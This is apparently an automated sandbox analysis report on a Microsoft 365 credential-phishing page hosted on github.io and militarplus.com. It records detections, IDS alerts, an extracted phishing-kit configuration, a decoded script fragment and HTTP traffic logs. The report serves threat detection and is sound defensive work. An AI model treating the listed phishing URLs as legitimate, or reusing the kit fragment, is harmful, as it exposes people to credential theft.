Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://procustodiavalueslive.github.io/mediantime1db1d62ef90e6fec5644546bc086f16336d68481479f56e29285a338fc23/

Overview

General Information

Sample URL:http://procustodiavalueslive.github.io/mediantime1db1d62ef90e6fec5644546bc086f16336d68481479f56e29285a338fc23/
Analysis ID:1589342
Infos:

Detection

HTMLPhisher, Mamba2FA
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected HtmlPhish10
Yara detected Mamba 2FA PaaS
AI detected landing page (webpage, office document or email)
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL
Invalid 'forgot password' link found
Invalid T&C link found

Classification

  • System is w10x64
  • chrome.exe (PID: 5464 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 1444 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1964,i,1605369592726491557,6296709681448517168,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 3416 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://procustodiavalueslive.github.io/mediantime1db1d62ef90e6fec5644546bc086f16336d68481479f56e29285a338fc23/" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
{"sv": "o365_1_nom", "rand": "T0REV3k=", "uid": "USER18112024U30111808"}
SourceRuleDescriptionAuthorStrings
2.1.pages.csvJoeSecurity_Mamba2FAYara detected Mamba 2FA PaaSJoe Security
    2.1.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      2.2.pages.csvJoeSecurity_Mamba2FAYara detected Mamba 2FA PaaSJoe Security
        2.2.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
          No Sigma rule has matched
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-12T01:25:07.310332+010020563161Successful Credential Theft Detected192.168.2.64980072.167.84.16443TCP
          2025-01-12T01:25:08.591468+010020563161Successful Credential Theft Detected192.168.2.64981172.167.84.16443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-12T01:25:07.108799+010020573331Successful Credential Theft Detected192.168.2.64980172.167.84.16443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: http://procustodiavalueslive.github.io/mediantime1db1d62ef90e6fec5644546bc086f16336d68481479f56e29285a338fc23/Avira URL Cloud: detection malicious, Label: phishing
          Source: https://procustodiavalueslive.github.io/favicon.icoAvira URL Cloud: Label: phishing
          Source: https://militarplus.com/m/jsnom.jsAvira URL Cloud: Label: phishing
          Source: https://militarplus.com/wp-content/uploads/2023/01/cropped-AF-Logo-Militar-Plus-04-1-32x32.webpAvira URL Cloud: Label: phishing
          Source: https://militarplus.com/favicon.icoAvira URL Cloud: Label: phishing
          Source: 2.1.pages.csvMalware Configuration Extractor: Mamba2FA {"sv": "o365_1_nom", "rand": "T0REV3k=", "uid": "USER18112024U30111808"}

          Phishing

          barindex
          Source: https://procustodiavalueslive.github.io/mediantime1db1d62ef90e6fec5644546bc086f16336d68481479f56e29285a338fc23/Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The URL 'procustodiavalueslive.github.io' does not match the legitimate domain for Microsoft., The URL is hosted on 'github.io', which is a common platform for hosting personal or project pages, not official Microsoft content., The URL contains no direct reference to Microsoft, which is suspicious for a page claiming to be associated with the brand., The input field email domain 'vnjla.co' does not appear to be associated with Microsoft, adding to the suspicion. DOM: 1.0.pages.csv
          Source: https://militarplus.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVQwUkVWM2s9JnVpZD1VU0VSMTgxMTIwMjRVMzAxMTE4MDg=N0123Nhd7qyd@vnjla.coJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The URL 'militarplus.com' does not match the legitimate domain for Microsoft., The domain 'militarplus.com' does not contain any recognizable association with Microsoft., The URL does not contain any subdomains or elements that suggest a legitimate Microsoft service or product., The domain name 'militarplus.com' is unrelated to Microsoft and could be a potential phishing attempt. DOM: 2.2.pages.csv
          Source: Yara matchFile source: 2.1.pages.csv, type: HTML
          Source: Yara matchFile source: 2.2.pages.csv, type: HTML
          Source: Yara matchFile source: 2.1.pages.csv, type: HTML
          Source: Yara matchFile source: 2.2.pages.csv, type: HTML
          Source: https://procustodiavalueslive.github.io/mediantime1db1d62ef90e6fec5644546bc086f16336d68481479f56e29285a338fc23/Joe Sandbox AI: Page contains button: 'Confirm' Source: '1.0.pages.csv'
          Source: https://procustodiavalueslive.github.io/mediantime1db1d62ef90e6fec5644546bc086f16336d68481479f56e29285a338fc23/HTTP Parser: Number of links: 0
          Source: https://militarplus.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVQwUkVWM2s9JnVpZD1VU0VSMTgxMTIwMjRVMzAxMTE4MDg=N0123Nhd7qyd@vnjla.coHTTP Parser: Number of links: 0
          Source: https://militarplus.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVQwUkVWM2s9JnVpZD1VU0VSMTgxMTIwMjRVMzAxMTE4MDg=N0123Nhd7qyd@vnjla.coHTTP Parser: <input type="password" .../> found but no <form action="...
          Source: https://procustodiavalueslive.github.io/mediantime1db1d62ef90e6fec5644546bc086f16336d68481479f56e29285a338fc23/HTTP Parser: Base64 decoded: const useVerifiedEmailList = 0; // Set to 1 for using email list, 0 for standard validationconst encodedEmailListPath = "aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2RldmVsZWN0L3Jlc3Ryb29tZm9ybWUvcmVmcy9oZWFkcy9tYWluL2xlZ2Fscy50eHQ"; // Base64 en...
          Source: https://procustodiavalueslive.github.io/mediantime1db1d62ef90e6fec5644546bc086f16336d68481479f56e29285a338fc23/HTTP Parser: Title: Identity Verification Needed does not match URL
          Source: https://militarplus.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVQwUkVWM2s9JnVpZD1VU0VSMTgxMTIwMjRVMzAxMTE4MDg=N0123Nhd7qyd@vnjla.coHTTP Parser: Title: Authenticating ... does not match URL
          Source: https://militarplus.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVQwUkVWM2s9JnVpZD1VU0VSMTgxMTIwMjRVMzAxMTE4MDg=N0123Nhd7qyd@vnjla.coHTTP Parser: Invalid link: Forgot password?
          Source: https://militarplus.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVQwUkVWM2s9JnVpZD1VU0VSMTgxMTIwMjRVMzAxMTE4MDg=N0123Nhd7qyd@vnjla.coHTTP Parser: Invalid link: Terms of use
          Source: https://militarplus.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVQwUkVWM2s9JnVpZD1VU0VSMTgxMTIwMjRVMzAxMTE4MDg=N0123Nhd7qyd@vnjla.coHTTP Parser: Invalid link: Privacy & cookies
          Source: https://militarplus.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVQwUkVWM2s9JnVpZD1VU0VSMTgxMTIwMjRVMzAxMTE4MDg=N0123Nhd7qyd@vnjla.coHTTP Parser: Invalid link: Terms of use
          Source: https://militarplus.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVQwUkVWM2s9JnVpZD1VU0VSMTgxMTIwMjRVMzAxMTE4MDg=N0123Nhd7qyd@vnjla.coHTTP Parser: Invalid link: Privacy & cookies
          Source: https://militarplus.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVQwUkVWM2s9JnVpZD1VU0VSMTgxMTIwMjRVMzAxMTE4MDg=N0123Nhd7qyd@vnjla.coHTTP Parser: <input type="password" .../> found
          Source: https://procustodiavalueslive.github.io/mediantime1db1d62ef90e6fec5644546bc086f16336d68481479f56e29285a338fc23/HTTP Parser: No favicon
          Source: https://militarplus.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVQwUkVWM2s9JnVpZD1VU0VSMTgxMTIwMjRVMzAxMTE4MDg=N0123Nhd7qyd@vnjla.coHTTP Parser: No favicon
          Source: https://militarplus.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVQwUkVWM2s9JnVpZD1VU0VSMTgxMTIwMjRVMzAxMTE4MDg=N0123Nhd7qyd@vnjla.coHTTP Parser: No favicon
          Source: https://procustodiavalueslive.github.io/mediantime1db1d62ef90e6fec5644546bc086f16336d68481479f56e29285a338fc23/HTTP Parser: No <meta name="author".. found
          Source: https://militarplus.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVQwUkVWM2s9JnVpZD1VU0VSMTgxMTIwMjRVMzAxMTE4MDg=N0123Nhd7qyd@vnjla.coHTTP Parser: No <meta name="author".. found
          Source: https://militarplus.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVQwUkVWM2s9JnVpZD1VU0VSMTgxMTIwMjRVMzAxMTE4MDg=N0123Nhd7qyd@vnjla.coHTTP Parser: No <meta name="author".. found
          Source: https://procustodiavalueslive.github.io/mediantime1db1d62ef90e6fec5644546bc086f16336d68481479f56e29285a338fc23/HTTP Parser: No <meta name="copyright".. found
          Source: https://militarplus.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVQwUkVWM2s9JnVpZD1VU0VSMTgxMTIwMjRVMzAxMTE4MDg=N0123Nhd7qyd@vnjla.coHTTP Parser: No <meta name="copyright".. found
          Source: https://militarplus.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVQwUkVWM2s9JnVpZD1VU0VSMTgxMTIwMjRVMzAxMTE4MDg=N0123Nhd7qyd@vnjla.coHTTP Parser: No <meta name="copyright".. found

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2056316 - Severity 1 - ET PHISHING Generic Credential Phish Landing Page (jsnom.js) : 192.168.2.6:49811 -> 72.167.84.16:443
          Source: Network trafficSuricata IDS: 2057333 - Severity 1 - ET PHISHING MAMBA Credential Phish Landing Page 2024-11-08 : 192.168.2.6:49801 -> 72.167.84.16:443
          Source: Network trafficSuricata IDS: 2056316 - Severity 1 - ET PHISHING Generic Credential Phish Landing Page (jsnom.js) : 192.168.2.6:49800 -> 72.167.84.16:443
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /mediantime1db1d62ef90e6fec5644546bc086f16336d68481479f56e29285a338fc23/ HTTP/1.1Host: procustodiavalueslive.github.ioConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: procustodiavalueslive.github.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://procustodiavalueslive.github.io/mediantime1db1d62ef90e6fec5644546bc086f16336d68481479f56e29285a338fc23/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /mediantime1db1d62ef90e6fec5644546bc086f16336d68481479f56e29285a338fc23/ HTTP/1.1Host: procustodiavalueslive.github.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /m/?c3Y9bzM2NV8xX25vbSZyYW5kPVQwUkVWM2s9JnVpZD1VU0VSMTgxMTIwMjRVMzAxMTE4MDg=N0123Nhd7qyd@vnjla.co HTTP/1.1Host: militarplus.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://procustodiavalueslive.github.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /m/jsnom.js HTTP/1.1Host: militarplus.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://militarplus.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVQwUkVWM2s9JnVpZD1VU0VSMTgxMTIwMjRVMzAxMTE4MDg=N0123Nhd7qyd@vnjla.coAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /4.7.5/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://militarplus.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://militarplus.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /m/jsnom.js HTTP/1.1Host: militarplus.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: militarplus.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://militarplus.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVQwUkVWM2s9JnVpZD1VU0VSMTgxMTIwMjRVMzAxMTE4MDg=N0123Nhd7qyd@vnjla.coAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /4.7.5/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /w3css/4/w3.css HTTP/1.1Host: www.w3schools.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://militarplus.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://militarplus.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/01/cropped-AF-Logo-Militar-Plus-04-1-32x32.webp HTTP/1.1Host: militarplus.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://militarplus.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVQwUkVWM2s9JnVpZD1VU0VSMTgxMTIwMjRVMzAxMTE4MDg=N0123Nhd7qyd@vnjla.coAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/01/cropped-AF-Logo-Militar-Plus-04-1-32x32.webp HTTP/1.1Host: militarplus.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /mediantime1db1d62ef90e6fec5644546bc086f16336d68481479f56e29285a338fc23/ HTTP/1.1Host: procustodiavalueslive.github.ioConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: procustodiavalueslive.github.io
          Source: global trafficDNS traffic detected: DNS query: militarplus.com
          Source: global trafficDNS traffic detected: DNS query: cdn.socket.io
          Source: global trafficDNS traffic detected: DNS query: www.w3schools.com
          Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 9115Server: GitHub.comContent-Type: text/html; charset=utf-8permissions-policy: interest-cohort=()ETag: "6765c4f0-239b"Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'X-GitHub-Request-Id: D9B9:2C71CC:21C7634:2644E88:67830BD3Accept-Ranges: bytesAge: 0Date: Sun, 12 Jan 2025 00:24:51 GMTVia: 1.1 varnishX-Served-By: cache-nyc-kteb1890083-NYCX-Cache: MISSX-Cache-Hits: 0X-Timer: S1736641491.195451,VS0,VE20Vary: Accept-EncodingX-Fastly-Request-ID: 6d93e7a124ee5efa3b68b7f6e676f8a2713ce3d7
          Source: chromecache_67.3.drString found in binary or memory: https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.
          Source: chromecache_65.3.dr, chromecache_67.3.drString found in binary or memory: https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e3281710
          Source: chromecache_65.3.dr, chromecache_67.3.drString found in binary or memory: https://aadcdn.msftauth.net/shared/1.0/content/images/appbackgrounds/49_6ffe0a92d779c878835b40171ffc
          Source: chromecache_65.3.dr, chromecache_67.3.drString found in binary or memory: https://cdn.socket.io/4.6.0/socket.io.min.js
          Source: chromecache_52.3.drString found in binary or memory: https://cdn.socket.io/4.7.5/socket.io.min.js
          Source: chromecache_69.3.drString found in binary or memory: https://githubstatus.com
          Source: chromecache_65.3.dr, chromecache_67.3.drString found in binary or memory: https://google.com
          Source: chromecache_69.3.drString found in binary or memory: https://help.github.com/pages/
          Source: chromecache_65.3.dr, chromecache_67.3.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.pn
          Source: chromecache_67.3.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.sv
          Source: chromecache_69.3.drString found in binary or memory: https://twitter.com/githubstatus
          Source: chromecache_65.3.dr, chromecache_67.3.drString found in binary or memory: https://www.w3schools.com/w3css/4/w3.css
          Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
          Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
          Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
          Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
          Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
          Source: classification engineClassification label: mal100.phis.win@18/43@22/11
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1964,i,1605369592726491557,6296709681448517168,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://procustodiavalueslive.github.io/mediantime1db1d62ef90e6fec5644546bc086f16336d68481479f56e29285a338fc23/"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
